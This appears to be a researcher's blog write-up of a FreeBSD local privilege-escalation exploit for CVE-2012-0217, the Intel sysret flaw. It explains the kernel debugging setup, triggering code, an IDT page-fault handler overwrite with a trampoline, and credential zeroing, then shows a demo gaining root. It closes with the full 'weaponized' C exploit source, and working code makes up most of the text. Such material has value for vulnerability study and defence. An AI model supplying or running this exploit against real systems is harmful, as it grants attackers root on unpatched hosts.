CVE-2012-0217: Intel's sysret Kernel Privilege Escalation (on FreeBSD)

CVE-2012-0217 was reported by Rafal Wojtczuk but ironically, it was fixed for Linux in 2006 as shown by CVE-2006-0744 without receiving much attention.

It is quite an interesting vulnerability on many aspects. Among them, and thanks to its hardware basis, it impacts many operating systems. For instance, as long as they run on a Intel processor in long mode (obviously), FreeBSD, NetBSD, Solaris, Xen and Microsoft Windows have been reported to be vulnerable. This therefore gives us quite an incentive to develop an exploit ;).

If you haven’t yet read Xen’s blog post The Intel SYSRET privilege escalation please do because we won’t go again into too much details about the vulnerability itself.

Without further delay, let’s dig right into the FreeBSD exploitation!

Overview

While developing an exploit, it helps to mentally take note or write down a TODO-list and/or roadmap to a successful exploitation. Here is one, sorted by exploitation chronological order:

  • A way to debug the kernel! (You really think one shot is all it takes? ;) )
  • Information gathering
  • Code to trigger the vulnerability
  • Getting arbitrary code execution
  • Keeping the kernel stable
  • Recovering from the general page fault exception (#GP)
  • Privilege escalation
  • Giving back a shellcode to the user
  • (3) Profit ;)

Of course this is not necessarily the order you follow when trying to come up with ideas to solve them. You don’t always (often?) even have a full roadmap until you actually come up with random ideas, ideas which slowly gather, start to make sense and flow together.

Kernel debugging

This is one of the most important items. Having a good debugging environment goes a long way toward a successful exploitation.

Many configurations could work, in this case, we run and debug the target OS (FreeBSD) under VMware Fusion on Mac OS X.

Indeed, VMware provides an easy way to debug the guest OS through a debug stub. Enabling it is easy, you just need to edit the .vmx file you’ll find inside your VMware’s VM (Right Click->Show Package Contents), and add the following line:

debugStub.listen.guest64 = "TRUE"

With this magic configuration line, VMware listens to the port 8864 and you therefore now are able to debug your VM’s OS using the gdb’s target command

(gdb) target remote localhost:8864

But to be useful we need to configure and cross-compile GDB for the FreeBSD target environment (amd64-marcel-freebsd), enabling us to load the FreeBSD’s kernel symbols into gdb. This requires gettext, gmp, and libelf but you can use MacPorts to install them.

As an example, using gdb 7.4.1:

% sudo port install gettext gmp libelf
[...]
% curl -O http://ftp.gnu.org/gnu/gdb/gdb-7.4.1.tar.bz2
[...]
% tar xvjf gdb-7.4.1.tar.bz2
[...]
% cd % cd gdb-7.4.1
gdb-7.4.1 % CFLAGS=-I/opt/local/include ./configure --prefix=/opt/local --program-suffix=-amd64-marcel-freebsd --target=amd64-marcel-freebsd
[...]
gdb-7.4.1 % make
[...]
gdb-7.4.1 % make install

And finally, just copy the FreeBSD’s /usr/src and /boot/kernel/ directories to Mac OS X.

And voila, you’re set!

% ls
kernel/ usr/
% gdb-amd64-marcel-freebsd -q -tui kernel/kernel
┌──Register group: general─────────────────────────────────────────────┐
│rax            0x0      0                                             │
│rbx            0x0      0                                             │
│rcx            0x100b   4107                                          │
│rdx            0x1008   4104                                          │
│rsi            0xffffff80001f6b54       -549753754796                 │
│rdi            0x1008   4104                                          │
│rbp            0xffffff80001f6b30       0xffffff80001f6b30            │
│rsp            0xffffff80001f6b30       0xffffff80001f6b30            │
│r8             0x0      0                                             │
│r9             0x0      0                                             │
│r10            0x2      2                                             │
│r11            0xffffffff8022fdb0       -2145190480                   │
│r12            0xffffff0002286200       -1099475426816                │
│r13            0xffffff0002286228       -1099475426776                │
    ┌──/usr/src/sys/amd64/acpica/acpi_machdep.c─────────────────────────┐
    │96      {                                                          │
    │97              return (0);                                        │
    │98      }                                                          │
    │99                                                                 │
    │100     void                                                       │
    │101     acpi_cpu_c1()                                              │
    │102     {                                                          │
    │103             __asm __volatile("sti; hlt");                      │
   >│104     }                                                          │
    │105                                                                │
    │106     /*                                                         │
    │107      * Support for mapping ACPI tables during early boot.  Curr│
    │108      * uses the crashdump map to map each table.  However, the │
    │109      * map is created in pmap_bootstrap() right after the direc│
    └───────────────────────────────────────────────────────────────────┘
remote Thread 1 In: acpi_cpu_c1       Line: 104  PC: 0xffffffff8092d1d6
Reading symbols from kernel/kernel...done.
(gdb) target remote localhost:8864
Remote debugging using localhost:8864
acpi_cpu_c1 () at /usr/src/sys/amd64/acpica/acpi_machdep.c:104
(gdb) 

NB: you can change the -tui layout using ctrl+x 2 multiple times

One warning though: you can’t easily step through anything. For instance, if you single-step through the function Xfast_syscall [1], the code

cli
testl $PCB_FULL_IRET,PCB_FLAGS(%rax)

would detect it needs a full iret and won’t use the sysret instruction.

The trick is therefore to set your breakpoints directly at the #GP’s and/or doublefault’s handlers (resp. Xprot() [2] and Xdblfault() [3]), which are triggered right after the sysret instruction execution. From there, you won’t have troubles single stepping and you’ll even see the page fault triggers once the kernel try to access some gs:data (we’ll see why soon enough).

Information gathering

During exploitation, we need a few kernel symbol addresses. Under FreeBSD we’re in luck: the kldsym() function provides an easy way for symbol lookups as shown by the following get_symaddr() function.

u_long get_symaddr(char *symname)
{
    struct kld_sym_lookup ksym;

    ksym.version = sizeof (ksym);
    ksym.symname = symname;

    if (kldsym(0, KLDSYM_LOOKUP, &ksym) < 0) {
        perror("kldsym");
        exit(1);
    }
    printf("    [+] Resolved %s to %#lx\n", ksym.symname, ksym.symvalue);
    return ksym.symvalue;
}

Vulnerability Triggering

Triggering the vulnerability is easy:

  • Allocate a page just before the non-canonical address boundary 0x0000800000000000
  • Call an arbitrary syscall using the syscall instruction right before the non-canonical address boundary

When the fastsyscall handler restores the user’s registers, executes sysret and therefore tries to return to the “next instruction” at 0x0000800000000000, on Intel’s processors, a #GP is triggered while still in kernel mode. Furthermore, an exception frame is pushed to the stack, which now happens to be the userland’s stack. Thus, we can trigger a kernel write to a location which is user controlled!

Hence, the following triggering code

uint64_t pagesize = getpagesize();
uint8_t * area = (uint8_t*)((1ULL << 47) - pagesize);
area = mmap(area, pagesize,
    PROT_READ | PROT_WRITE | PROT_EXEC,
    MAP_FIXED | MAP_ANON | MAP_PRIVATE, -1, 0);
if (area == MAP_FAILED) {
    perror("mmap (trigger)");
    exit(1);
}

// Copy the trigger code at the end of the page
// such that the syscall instruction is at its
// boundary
char triggercode[] =
    "\xb8\x18\x00\x00\x00" // mov rax, 24; #getuid
    "\x48\x89\xe3" // mov rbx, rsp; save the user's stack for later
    "\x48\xbc\xbe\xba\xfe\xca\xde\xc0\xad\xde" // mov rsp, 0xdeadc0decafebabe
    "\x0f\x05"; // syscall

uint8_t * trigger_addr = area + pagesize - TRIGGERCODESIZE;
memcpy(trigger_addr, triggercode, TRIGGERCODESIZE);

The question now is, what do we set rsp to?

Follow the white rabbit…

Arbitrary code execution

There are two outcomes given a target rsp:

  • if rsp can’t be written to, a double fault is triggered (Xdblfault() [3]) and the exception frame is pushed to a special stack
  • otherwise a #GP is triggered (Xprot() [2]) and the exception frame is pushed to [rsp]

In the latter case, the trouble is (or is it?)… The #GP triggers a page fault (Xpage() [4]). Let’s see why.

IDTVEC(prot)
    subq    $TF_ERR,%rsp
    movl    $T_PROTFLT,TF_TRAPNO(%rsp)                               [1]
    movq    $0,TF_ADDR(%rsp)                                         [2]
    movq    %rdi,TF_RDI(%rsp)   /* free up a GP register */          [3]
    leaq    doreti_iret(%rip),%rdi
    cmpq    %rdi,TF_RIP(%rsp)
    je  1f          /* kernel but with user gsbase!! */
    testb   $SEL_RPL_MASK,TF_CS(%rsp) /* Did we come from kernel? */ [4]
    jz  2f          /* already running with kernel GS.base */
1:  swapgs
2:  movq    PCPU(CURPCB),%rdi                                        [5]

[4] sets the Z flag because we come from the kernel (while executing sysret) and we therefore skip the swapgs instruction. But in this particular chain of event, GS is in fact the user’s GS.base! Indeed it was restored just before calling sysret… Hence, accessing gs:data at [5] triggers a page fault (Xpage() [4]).

If we don’t do anything we’ll eventually doublefault, tripplefault etc. and crash miserably.

We therefore need a way:

  1. to recover from the #GP
  2. to clean any mess we did/overwrote

Both could be solved if we can get get an arbitrary code execution by the time we reach [5]. (NB: this is not mandatory, we could get the code execution later down the fault trigger chain)

So… here is the idea: wouldn’t it be nice if we could overwrite the page fault handler’s address and therefore get code execution when [5] triggers the #PF?

Yes indeed, and that’s how we’re going to exploit it :-)

First a few structures for reference:

Gate descriptor:
+0:  Target Offset[15:0] | Target Selector
+4:  Some stuff          | Target Offset[31:16]
+8:  Target Offset[63:32]
+12: Some more stuff

and from include/frame.h:

struct trapframe {
    register_t  tf_rdi;
    register_t  tf_rsi;
    register_t  tf_rdx;
    register_t  tf_rcx;
    register_t  tf_r8;
    register_t  tf_r9;
    register_t  tf_rax;
    register_t  tf_rbx;
    register_t  tf_rbp;
    register_t  tf_r10;
    register_t  tf_r11;
    register_t  tf_r12;
    register_t  tf_r13;
    register_t  tf_r14;
    register_t  tf_r15;
    uint32_t    tf_trapno;
    uint16_t    tf_fs;
    uint16_t    tf_gs;
    register_t  tf_addr;
    uint32_t    tf_flags;
    uint16_t    tf_es;
    uint16_t    tf_ds;
    /* below portion defined in hardware */
    register_t  tf_err;
    register_t  tf_rip;
    register_t  tf_cs;
    register_t  tf_rflags;
    register_t  tf_rsp;
    register_t  tf_ss;
};

When the exception is triggered, the hardware pushes ss, rsp, rflags, cs, rip and err.

We can see that [1], [2] and [3] write to the stack.

  • [3] is fully user-controlled through rdi, so we could try to align rsp such that [3] overwrites the #PF’s offset address.

    The trouble is… rsp is automatically 16-byte aligned when an exception is triggered. We can therefore only overwrite the first 32-LSB of the offset address (check how rdi is 16byte aligned in this trapframe if you don’t understand why).

  • [2] writes 0 to tf_addr which is also 16-byte aligned. So no dice.

  • That leaves us with [1] which writes T_PROTFLT (0x9) to tf_trapno and tf_trapno is 16-byte aligned + 8! This enables us to set Target Offset[63:32] to 0x9.

Thus, if we set rsp to &idt[14] + 10*8 (to align tf_trapno with the #PF’s Target Offset[63:32]), we can set the #PF handler’s address to 0x9WWXXYYZZ.

Furthermore, WWXXYYZZ is known since we can get the #PF’s address through get_symaddr(). To get an arbitrary code execution, the idea is therefore to setup a trampoline code at 0x9WWXXYYZZ, which contains some setup code and a jump to our kernel mode payload (pointed by rax in the following code).

*(uint64_t*)(trigger_addr + 10) = (uint64_t)(((uint8_t*)&sidt()[14]) + 10 * 8);

char trampolinecode[] =
    "\x0f\x01\xf8" // swapgs; switch back to the kernel's GS.base
    "\x48\x89\xdc" // mov rsp, rbx; restore rsp, it's enough to use the user's stack
    "\x48\xb8\xbe\xba\xfe\xca\xde\xc0\xad\xde" // mov rax, 0xdeadc0decafebabe
    "\xff\xe0"; // jmp rax

uint8_t * trampoline = (uint8_t*)(0x900000000 | (Xpage_ptr & 0xFFFFFFFF));
size_t trampoline_allocsize = pagesize;
// We round the address to the PAGESIZE for the allocation
// Not enough space for the trampoline code ?
if ((uint8_t*)((uint64_t)trampoline & ~(pagesize-1)) + pagesize < trampoline + TRAMPOLINECODESIZE)
    trampoline_allocsize += pagesize;
if (mmap((void*)((uint64_t)trampoline & ~(pagesize-1)), trampoline_allocsize,
    PROT_READ | PROT_WRITE | PROT_EXEC,
    MAP_FIXED | MAP_ANON | MAP_PRIVATE, -1, 0) == MAP_FAILED)
{
    perror("mmap (trampoline)");
    exit(1);
}
memcpy(trampoline, trampolinecode, TRAMPOLINECODESIZE);
*(uint64_t*)(trampoline + 8) = (uint64_t)kernelmodepayload;

Keeping the kernel stable

Getting a root shell and crashing after 1us is not fun, isn’t it? We’d better restore whatever we overwrote in the kernel space while trying to achieve code execution…

Let’s summarize what we smashed with rsp initialized to idt[14] + 10*8, i.e. idt[19]:

  • The #GP exception frame writes 6*64bit registers, i.e. it overwrites idt[18], idt[17] and idt[16]
  • tf_addr overwrites the 64-LSB of idt[15]
  • tf_trapno overwrites the Target Offset[63:32] field of idt[14]
  • rdi overwrites the 64-LSB of idt[7]
  • The #PF exception frame overwrites idt[6], idt[5] and idt[4]

Thus overall, the IDT’s entries 4, 5, 6, 7, 14, 15, 16, 17, and 18 need to be restored and we should be safe.

struct gate_descriptor *idt = sidt();
setidt(idt, IDT_OF, Xofl_ptr, SDT_SYSIGT, SEL_KPL, 0); // 4
setidt(idt, IDT_BR, Xbnd_ptr, SDT_SYSIGT, SEL_KPL, 0); // 5
setidt(idt, IDT_UD, Xill_ptr, SDT_SYSIGT, SEL_KPL, 0); // 6
setidt(idt, IDT_NM, Xdna_ptr, SDT_SYSIGT, SEL_KPL, 0); // 7
setidt(idt, IDT_PF, Xpage_ptr, SDT_SYSIGT, SEL_KPL, 0); // 14
setidt(idt, IDT_MF, Xfpu_ptr, SDT_SYSIGT, SEL_KPL, 0); // 15
setidt(idt, IDT_AC, Xalign_ptr, SDT_SYSIGT, SEL_KPL, 0); // 16
setidt(idt, IDT_MC, Xmchk_ptr, SDT_SYSIGT, SEL_KPL, 0); // 17
setidt(idt, IDT_XF, Xxmm_ptr, SDT_SYSIGT, SEL_KPL, 0); // 18

Privilege escalation

This part is quite standard and easy, we just need to retrieve the current user credentials struct’s address, and set the various IDs to 0 (root).

Knowing that the current thread struct’s address can be read from gs:0 uder FreeBSD, this yields to the following code.

struct thread *td;
struct ucred *cred;

// get the thread pointer
asm ("mov %%gs:0, %0" : "=r"(td));

// The Dark Knight Rises
cred = td->td_proc->p_ucred;
cred->cr_uid = cred->cr_ruid = cred->cr_rgid = 0;
cred->cr_groups[0] = 0;

Shellcode

Finally… We return to our userland shellcode using the sysret instruction.

// return to user mode to spawn the shell
asm ("swapgs; sysretq;" :: "c"(shellcode)); // store the shellcode addr to rcx

And the shellcode? What shellcode? :P

The user credentials struct is cached/shared among the user’s processes. Since we modified it, the caller’s shell will automagically inherit from this privilege escalation.

Hence the following shellcode ;-)

void shellcode()
{
    // Actually we dont really need to spawn a shell since we
    // changed our whole cred struct.
    // Just exit...
    printf("[*] Got root!\n");
    exit(0);
}

Demo

$ uname -a
FreeBSD FreeBSD 9.0 64bit 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan  3 07:46:30 UTC 2012     root@farrell.cse.buffalo.    edu:/usr/obj/usr/src/sys/GENERIC  amd64
$ id
uid=1001(qwerty) gid=1001(qwerty) groups=1001(qwerty)
$ ls -l
total 24
-rwxr-xr-x  1 qwerty  qwerty  11693 Jul  5 17:49 CVE-2012-0217
-rw-r--r--  1 qwerty  qwerty  10763 Jul  5 17:49 CVE-2012-0217.c
$ ./CVE-2012-0217
CVE-2012-0217 Intel sysret exploit -- iZsh (izsh at fail0verflow.com)

[*] Retrieving host information...
    [+] CPU: GenuineIntel
    [+] sysname: FreeBSD
    [+] release: 9.0-RELEASE
    [+] version: FreeBSD 9.0-RELEASE #0: Tue Jan  3 07:46:30 UTC 2012     root@farrell.cse.buffalo. edu:/usr/obj/usr/src/sys/GENERIC
    [+] machine: amd64
[*] Validating target OS and version...
    [+] Vulnerable :-)
[*] Resolving kernel addresses...
    [+] Resolved Xofl to 0xffffffff80b02e70
    [+] Resolved Xbnd to 0xffffffff80b02ea0
    [+] Resolved Xill to 0xffffffff80b02ed0
    [+] Resolved Xdna to 0xffffffff80b02f00
    [+] Resolved Xpage to 0xffffffff80b03240
    [+] Resolved Xfpu to 0xffffffff80b02fc0
    [+] Resolved Xalign to 0xffffffff80b03080
    [+] Resolved Xmchk to 0xffffffff80b02f60
    [+] Resolved Xxmm to 0xffffffff80b02ff0
[*] Setup...
    [+] Trigger code...
    [+] Trampoline code...
[*] Fire in the hole!
[*] Got root!
$ id
uid=0(root) gid=0(wheel) groups=0(wheel)

Final words

The final exploit is quite stable, nicely recovers and exit back to the user’s shell. It works on both FreeBSD 8 and 9 (and probably 7) as-is with the stock kernels without any need for special magic hardcoded values; but of course the environment could be hardened.

To conclude: the mandatory video :-)

And… That’s a wrap!

Hope you enjoyed it. Feel free to comment or discuss other exploitation paths.

[1] Xfast_syscall is defined in sys/amd64/amd64/exception.S
[2] Xprot is defined in sys/amd64/amd64/exception.S
[3] Xdblfault is defined in sys/amd64/amd64/exception.S
[4] Xpage is defined in sys/amd64/amd64/exception.S

The full weaponized exploit
also available on github

// CVE-2012-0217 Intel sysret exploit -- iZsh (izsh at fail0verflow.com)
// Copyright 2012 all right reserved, not for commercial uses, bitches
// Infringement Punishment: Monkeys coming out of your ass Bruce Almighty style.
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <unistd.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/utsname.h>
#include <machine/cpufunc.h>
#define _WANT_UCRED
#include <sys/proc.h>
#include <machine/segments.h>
#include <sys/param.h>
#include <sys/linker.h>

uintptr_t Xofl_ptr, Xbnd_ptr, Xill_ptr, Xdna_ptr, Xpage_ptr, Xfpu_ptr, Xalign_ptr, Xmchk_ptr, Xxmm_ptr;

struct gate_descriptor * sidt()
{
    struct region_descriptor idt;

    asm ("sidt %0": "=m"(idt));

    return (struct gate_descriptor*)idt.rd_base;
}

u_long get_symaddr(char *symname)
{
    struct kld_sym_lookup ksym;

    ksym.version = sizeof (ksym);
    ksym.symname = symname;

    if (kldsym(0, KLDSYM_LOOKUP, &ksym) < 0) {
        perror("kldsym");
        exit(1);
    }
    printf("    [+] Resolved %s to %#lx\n", ksym.symname, ksym.symvalue);
    return ksym.symvalue;
}

// Code taken from amd64/amd64/machdep.c
void setidt(struct gate_descriptor *idt, int idx, uintptr_t func, int typ, int dpl, int ist)
{
    struct gate_descriptor *ip;

    ip = idt + idx;
    ip->gd_looffset = func;
    ip->gd_selector = GSEL(GCODE_SEL, SEL_KPL);
    ip->gd_ist = ist;
    ip->gd_xx = 0;
    ip->gd_type = typ;
    ip->gd_dpl = dpl;
    ip->gd_p = 1;
    ip->gd_hioffset = func>>16;
}

void shellcode()
{
    // Actually we dont really need to spawn a shell since we
    // changed our whole cred struct.
    // Just exit...
    printf("[*] Got root!\n");
    exit(0);
}

void kernelmodepayload()
{
    struct thread *td;
    struct ucred *cred;

    // We need to restore/recover whatever we smashed
    // We inititalized rsp to idt[14] + 10*8, i.e. idt[19] (see trigger())
    // The #GP exception frame writes 6*64bit registers, i.e. it overwrites
    // idt[18], idt[17] and idt[16]
    // thus overall we have:
    // - idt[18], idt[17] and idt[16] are trashed
    // - tf_addr -> overwrites the 64bit-LSB of idt[15]
    // - tf_trapno -> overwrites Target Offset[63:32] of idt[14]
    // - rdi -> overwrites the 64bit-LSB of idt[7]
    // - #PF exception frame overwrites idt[6], idt[5] and idt[4]
    struct gate_descriptor *idt = sidt();
    setidt(idt, IDT_OF, Xofl_ptr, SDT_SYSIGT, SEL_KPL, 0); // 4
    setidt(idt, IDT_BR, Xbnd_ptr, SDT_SYSIGT, SEL_KPL, 0); // 5
    setidt(idt, IDT_UD, Xill_ptr, SDT_SYSIGT, SEL_KPL, 0); // 6
    setidt(idt, IDT_NM, Xdna_ptr, SDT_SYSIGT, SEL_KPL, 0); // 7
    setidt(idt, IDT_PF, Xpage_ptr, SDT_SYSIGT, SEL_KPL, 0); // 14
    setidt(idt, IDT_MF, Xfpu_ptr, SDT_SYSIGT, SEL_KPL, 0); // 15
    setidt(idt, IDT_AC, Xalign_ptr, SDT_SYSIGT, SEL_KPL, 0); // 16
    setidt(idt, IDT_MC, Xmchk_ptr, SDT_SYSIGT, SEL_KPL, 0); // 17
    setidt(idt, IDT_XF, Xxmm_ptr, SDT_SYSIGT, SEL_KPL, 0); // 18

    // get the thread pointer
    asm ("mov %%gs:0, %0" : "=r"(td));

    // The Dark Knight Rises
    cred = td->td_proc->p_ucred;
    cred->cr_uid = cred->cr_ruid = cred->cr_rgid = 0;
    cred->cr_groups[0] = 0;

    // return to user mode to spawn the shell
    asm ("swapgs; sysretq;" :: "c"(shellcode)); // store the shellcode addr to rcx
}

#define TRIGGERCODESIZE 20
#define TRAMPOLINECODESIZE 18

void trigger()
{
    printf("[*] Setup...\n");
    // Allocate one page just before the non-canonical address
    printf("    [+] Trigger code...\n");
    uint64_t pagesize = getpagesize();
    uint8_t * area = (uint8_t*)((1ULL << 47) - pagesize);
    area = mmap(area, pagesize,
        PROT_READ | PROT_WRITE | PROT_EXEC,
        MAP_FIXED | MAP_ANON | MAP_PRIVATE, -1, 0);
    if (area == MAP_FAILED) {
        perror("mmap (trigger)");
        exit(1);
    }

    // Copy the trigger code at the end of the page
    // such that the syscall instruction is at its
    // boundary
    char triggercode[] =
        "\xb8\x18\x00\x00\x00" // mov rax, 24; #getuid
        "\x48\x89\xe3" // mov rbx, rsp; save the user's stack for later
        "\x48\xbc\xbe\xba\xfe\xca\xde\xc0\xad\xde" // mov rsp, 0xdeadc0decafebabe
        "\x0f\x05"; // syscall

    uint8_t * trigger_addr = area + pagesize - TRIGGERCODESIZE;
    memcpy(trigger_addr, triggercode, TRIGGERCODESIZE);

    // There are two outcomes given a target rsp:
    // - if rsp can't be written to, a double fault is triggered
    //   (Xdblfault defined in sys/amd64/amd64/exception.S)
    //   and the exception frame is pushed to a special stack
    // - otherwise a #GP is triggered
    //   (Xprot defined in sys/amd64/amd64/exception.S)
    //   and the exception frame is pushed to [rsp]
    //
    // In the latter case, trouble is... #GP triggers a page fault
    // (Xpage):
    //  IDTVEC(prot)
    //      subq    $TF_ERR,%rsp
    //  [1] movl    $T_PROTFLT,TF_TRAPNO(%rsp)
    //  [2] movq    $0,TF_ADDR(%rsp)
    //  [3] movq    %rdi,TF_RDI(%rsp)   /* free up a GP register */
    //      leaq    doreti_iret(%rip),%rdi
    //      cmpq    %rdi,TF_RIP(%rsp)
    //      je  1f          /* kernel but with user gsbase!! */
    //  [4] testb   $SEL_RPL_MASK,TF_CS(%rsp) /* Did we come from kernel? */
    //      jz  2f          /* already running with kernel GS.base */
    //  1:  swapgs
    //  2:  movq    PCPU(CURPCB),%rdi [5]
    //
    // [4] sets the Z flag because we come from the kernel (while executing sysret)
    // and we therefore skip swapgs. But GS is in fact the user GS.base! Indeed
    // it was restored just before calling sysret...
    // Thus, [5] triggers a pagefault while trying to access gs:data
    // If we don't do anything we'll eventually doublefault, tripplefault etc. and crash
    //
    // We therefore need a way: (1) to recover from the GP, (2) to clean
    // any mess we did. Both could be solved if we can get get an arbitrary
    // code execution by the time we reach [5] (NB: this is not mandatory, we could
    // get the code execution later down the fault trigger chain)
    //
    // So... here is the idea: wouldn't it be nice if we could overwrite the
    // page fault handler's address and therefore get code execution when [5]
    // triggers the #PF?
    //
    // For reference:
    // Gate descriptor:
    // +0: Target Offset[15:0] | Target Selector
    // +4: Some stuff | Target Offset[31:16]
    // +8: Target Offset[63:32]
    // +12: Stuff
    //
    // and from include/frame.h:
    //  struct trapframe {
    //      register_t  tf_rdi;
    //      register_t  tf_rsi;
    //      register_t  tf_rdx;
    //      register_t  tf_rcx;
    //      register_t  tf_r8;
    //      register_t  tf_r9;
    //      register_t  tf_rax;
    //      register_t  tf_rbx;
    //      register_t  tf_rbp;
    //      register_t  tf_r10;
    //      register_t  tf_r11;
    //      register_t  tf_r12;
    //      register_t  tf_r13;
    //      register_t  tf_r14;
    //      register_t  tf_r15;
    //      uint32_t    tf_trapno;
    //      uint16_t    tf_fs;
    //      uint16_t    tf_gs;
    //      register_t  tf_addr;
    //      uint32_t    tf_flags;
    //      uint16_t    tf_es;
    //      uint16_t    tf_ds;
    //      /* below portion defined in hardware */
    //      register_t  tf_err;
    //      register_t  tf_rip;
    //      register_t  tf_cs;
    //      register_t  tf_rflags;
    //      register_t  tf_rsp;
    //      register_t  tf_ss;
    //  };
    //
    // When the exception is triggered, the hardware pushes
    // ss, rsp, rflags, cs, rip and err
    //
    // We can see that [1], [2] and [3] write to the stack
    // [3] is fully user-controlled through rdi, so we could try to align
    // rsp such that [3] overwrites the offset address
    //
    // The trouble is... rsp is 16byte aligned for exceptions. We can
    // therefore only overwrite the first 32-LSB of the offset address
    // (check how rdi is 16byte aligned in this trapframe)
    //
    // [2] writes 0 to tf_addr which is also 16byte aligned. So no dice.
    // That leaves us with [1] which writes T_PROTFLT (0x9) to tf_trapno
    // and tf_trapno is 16byte aligned + 8!
    // This enables us to set Target Offset[63:32] to 0x9
    //
    // We set rsp to &idt[14] + 10 * 8 (to align tf_trapno with Offset[63:32])
    *(uint64_t*)(trigger_addr + 10) = (uint64_t)(((uint8_t*)&sidt()[14]) + 10 * 8);
    // Hence, the #PF handler's address is now 0x9WWXXYYZZ
    // Furthermore, WWXXYYZZ is known since we can get (see get_symaddr()) the #PF's address
    // Thus, the idea is to setup a trampoline code at 0x9WWXXYYZZ which does
    // some setup and jump to our kernel mode code
    printf("    [+] Trampoline code...\n");
    char trampolinecode[] =
        "\x0f\x01\xf8" // swapgs; switch back to the kernel's GS.base
        "\x48\x89\xdc" // mov rsp, rbx; restore rsp, it's enough to use the user's stack
        "\x48\xb8\xbe\xba\xfe\xca\xde\xc0\xad\xde" // mov rax, 0xdeadc0decafebabe
        "\xff\xe0"; // jmp rax

    uint8_t * trampoline = (uint8_t*)(0x900000000 | (Xpage_ptr & 0xFFFFFFFF));
    size_t trampoline_allocsize = pagesize;
    // We round the address to the PAGESIZE for the allocation
    // Not enough space for the trampoline code ?
    if ((uint8_t*)((uint64_t)trampoline & ~(pagesize-1)) + pagesize < trampoline + TRAMPOLINECODESIZE)
        trampoline_allocsize += pagesize;
    if (mmap((void*)((uint64_t)trampoline & ~(pagesize-1)), trampoline_allocsize,
        PROT_READ | PROT_WRITE | PROT_EXEC,
        MAP_FIXED | MAP_ANON | MAP_PRIVATE, -1, 0) == MAP_FAILED)
    {
        perror("mmap (trampoline)");
        exit(1);
    }
    memcpy(trampoline, trampolinecode, TRAMPOLINECODESIZE);
    *(uint64_t*)(trampoline + 8) = (uint64_t)kernelmodepayload;
    // Call it
    printf("[*] Fire in the hole!\n");
    ((void (*)())trigger_addr)();
}

typedef struct validtarget
{
    char * sysname;
    char * release;
    char * machine;
} validtarget_t;

int validate_target(char * sysname, char * release, char * machine)
{
    validtarget_t targets[] = {
        { "FreeBSD", "8.3-RELEASE", "amd64" },
        { "FreeBSD", "9.0-RELEASE", "amd64" },
        { 0, 0, 0 }
    };

    int found = 0;
    int i = 0;

    while (!found && targets[i].sysname) {
        found = !strcmp(targets[i].sysname, sysname)
            && !strcmp(targets[i].release, release)
            && !strcmp(targets[i].machine, machine);
        ++i;
    }
    return found;
}

void get_cpu_vendor(char * cpu_vendor)
{
    u_int regs[4];

    do_cpuid(0, regs);
    ((u_int *)cpu_vendor)[0] = regs[1];
    ((u_int *)cpu_vendor)[1] = regs[3];
    ((u_int *)cpu_vendor)[2] = regs[2];
    cpu_vendor[12] = '\0';
}

int is_intel()
{
    char cpu_vendor[13];

    get_cpu_vendor(cpu_vendor);
    return !strcmp(cpu_vendor, "GenuineIntel");
}

int main(int argc, char *argv[])
{
    printf("CVE-2012-0217 Intel sysret exploit -- iZsh (izsh at fail0verflow.com)\n\n");

    printf("[*] Retrieving host information...\n");
    char cpu_vendor[13];
    get_cpu_vendor(cpu_vendor);
    struct utsname ver;
    uname(&ver);
    printf("    [+] CPU: %s\n", cpu_vendor);
    printf("    [+] sysname: %s\n", ver.sysname);
    printf("    [+] release: %s\n", ver.release);
    printf("    [+] version: %s\n", ver.version);
    printf("    [+] machine: %s\n", ver.machine);
    printf("[*] Validating target OS and version...\n");
    if (!is_intel() || !validate_target(ver.sysname, ver.release, ver.machine)) {
        printf("    [+] NOT Vulnerable :-(\n");
        exit(1);
    } else
        printf("    [+] Vulnerable :-)\n");
    // Prepare the values we'll need to restore the kernel to a stable state
    printf("[*] Resolving kernel addresses...\n");
    Xofl_ptr = (uintptr_t)get_symaddr("Xofl");
    Xbnd_ptr = (uintptr_t)get_symaddr("Xbnd");
    Xill_ptr = (uintptr_t)get_symaddr("Xill");
    Xdna_ptr = (uintptr_t)get_symaddr("Xdna");
    Xpage_ptr = (uintptr_t)get_symaddr("Xpage");
    Xfpu_ptr = (uintptr_t)get_symaddr("Xfpu");
    Xalign_ptr = (uintptr_t)get_symaddr("Xalign");
    Xmchk_ptr = (uintptr_t)get_symaddr("Xmchk");
    Xxmm_ptr = (uintptr_t)get_symaddr("Xxmm");
    // doeet!
    trigger();
    return 0;
}